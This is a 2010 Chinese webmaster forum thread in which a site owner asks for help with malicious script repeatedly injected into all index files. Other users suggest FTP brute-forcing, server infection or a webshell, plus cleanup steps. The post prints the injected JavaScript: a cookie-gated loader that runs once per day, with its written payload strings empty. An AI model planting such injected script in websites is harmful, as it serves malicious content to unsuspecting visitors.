恶意代码无法去除，急急急！！！

lzchengy · 发表于 2010-12-8 19:56:59

我的站近来老是被类似的恶意代码加入到所有index.php和index.html文件最末尾，把这些代码删除后很快又回来了，我把所有网站文件删除后再全新安装，数据还没恢复，但是很快又被插入相似的代码，首页甚至被插入二、三条。把这恶意地址复制到浏览器打开，显示代码如下
function Get(){var Then = new Date() Then.setTime(Then.getTime() + 24*60*60*1000)var cookieString = new String(document.cookie)var cookieHeader = "Cookie1=" var beginPosition = cookieString.indexOf(cookieHeader)if (beginPosition != -1){ } else { document.cookie = "Cookie1=sb1;expires="+ Then.toGMTString()document.write("")document.write("")document.write("")document.write("")}}Get();它们是想干什么呢？那些恶意地址又是怎么来的呢？我都几天没安装好网站了，怕害了无辜，怎么办？请高手指点

lzchengy · 发表于 2010-12-8 23:39:57

曾发现四种代码，一天换一种

100tea · 发表于 2010-12-9 01:52:05

经常修改空间的FTP密码可能被人穷举了FTP密码

lzchengy · 发表于 2010-12-9 08:29:20

我以前也碰到这中情况，到最后也没有找到原因。。。。

bumanyidegun · 发表于 2010-12-9 23:51:40

我感觉是服务器感染的，复制能力非常强，速度非常快，不是人工能加入去的，系统百几十个index文件不是人工一下子能加的。奇怪的是今天我用以前在网站后台备份的数据没发现问题，可能是用主机控制面板备份的数据有问题。

[ 本帖最后由 lzchengy 于 2010-12-10 20:12 编辑 ]

bumanyidegun · 发表于 2010-12-10 11:53:10

挂马了呗，程序下载到本地搜索找到木马文件，进入木马管理后台清除，然后在把文件删除，不过治标不治本，还是找到bug然后修补。

		自动登录	找回密码
密码			立即注册